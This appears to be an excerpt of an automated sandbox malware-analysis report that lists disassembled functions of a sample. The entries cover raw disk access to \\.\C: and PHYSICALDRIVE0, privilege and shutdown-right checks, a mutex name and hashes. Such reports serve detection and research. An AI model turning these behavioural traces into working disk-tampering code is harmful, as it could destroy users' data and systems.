                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c3339b175f8b132734afde4b87bcd326777cd273dbfa93b5593f16fc1374389e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DF0F876C0020CBFCF01AFA5D955C9DBFB9FF48200F0084AEB91466162D7369A20AB54
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00408958 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlCreateDeviceFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 107608037-2160117148
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6179182b2b83b9443c5bd9d33f461fa1aeab268a59a3a7b7debce46551af33e6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF216D38640348EFD718CF68ED45F99BBB4EB48701F10C1AAE905AB3E1D6B49B40CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040895B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlCreateDeviceFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 107608037-2160117148
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 711083b2bbb86b7d36e7a7c78397dedf6b4307ebbdc5261e1e4f3fe33cb2826c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F215C38600308AFD718CF58DC46F99BBB4AB48701F10C0AAE905AB3E1D6B4AA40CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00408951 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlCreateDeviceFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 107608037-2160117148
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 389e508c5a35674a8dec956cf5ed0ace9ff19c3110c7d277eeff61c57732489a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79216D78604348EFD708CF58E855BA9BBB4EB48711F10C1AAE905AB3E1D7B49B40CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004082B6 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 00404845
                                                                                                                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004082F8
                                                                                                                                                                                                                                                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 0040AA9C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a4effce1087fb57fd00f7ec72273620cf91c437d6a0f92fe25e66b5b43bbe758
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1502378442f3bba6843c10e462c5ea7b9d530f023e777048d123248eda5abe90
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4effce1087fb57fd00f7ec72273620cf91c437d6a0f92fe25e66b5b43bbe758
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9014470A04348FAEB10DBE4C948BEEBFB8AB15705F008499E101BA1C1D3B89B04DB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040B453 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4278b43e27663415cba18f20cd4f792bdb1a65b806582fdca38cb5ba5a4c1545
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D515B75A04244DFEB08CF98C590BAABBB2EF94304F2881E9D9015B387C675EE41DB91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040D1F6 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 169libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040AEB6,?,?,004046B5), ref: 0040D1FE
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040D336
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D3A8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: advapi32.dll$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2593893887-1356967432
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ca720bcfbdb204521244a6d16e88fbee784b87e4b750a5d7fd7297a05bd30f3d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC511DF2D10210EFD304BFA1BCC28393AB5E649305744457FF985A72A1F6B9A9448B6B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004023F2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402404
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(NTDLL.DLL), ref: 004024D2
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID: NTDLL.DLL$SeShutdownPrivilege$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-2471717051
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3c0ce9a7761a6e63309c521fc4ca6a6d9466e377a545f21450368ef7aac56ae8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F13146B1E10209EBDB04DFE0CD46BEEBB74EB44701F20416AF501B66C0E7795A44CBA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00405312 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlNtStatusToDosError.NTDLL(C0000023), ref: 004037E8
                                                                                                                                                                                                                                                                                                                                                                  • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 004037EF
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Error$EnvironmentExpandInitLastRestoreStatusStringStrings_UnicodeWin32
                                                                                                                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4202685462-1885708031
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2625ad76528c3a05819e41784e94355af3192e6a8ec1aace2841fc774e878e1c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5115175D14209EFDB14DFE4C984AAEBB79EF08301F10856AE915B32C0EB789705CB56
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004050A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,00600000), ref: 004050CC
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,explorer.exe), ref: 004050DE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InitStringUnicode
                                                                                                                                                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4228678080-3187896405
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 050ed0569a6514cfdb40d37d4b6a842c1993e2635d6f26a1999b978f90a0d4ff
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAF09074204248EFCB04CF54C880E6ABBA6FB49304F20855AFC0597381C674ED91CB9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403AEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,jmuZVxzUSQKZJ,?,?,004044C1,?,?,004046B5), ref: 00403AFB
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004044C1,?,?,004046B5), ref: 00403B06
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                                                                                  • String ID: jmuZVxzUSQKZJ
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1925916568-1615886713
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0594eaefbf50b0c8ed9c9a89b72dfe51cd43608961eacb7f94053228cce8ae52
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D017B044A304FAE3008F50DE4DB587EA4EB10702F208036E2026A2D4E3F85A45564A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:21.6%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:52
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:13
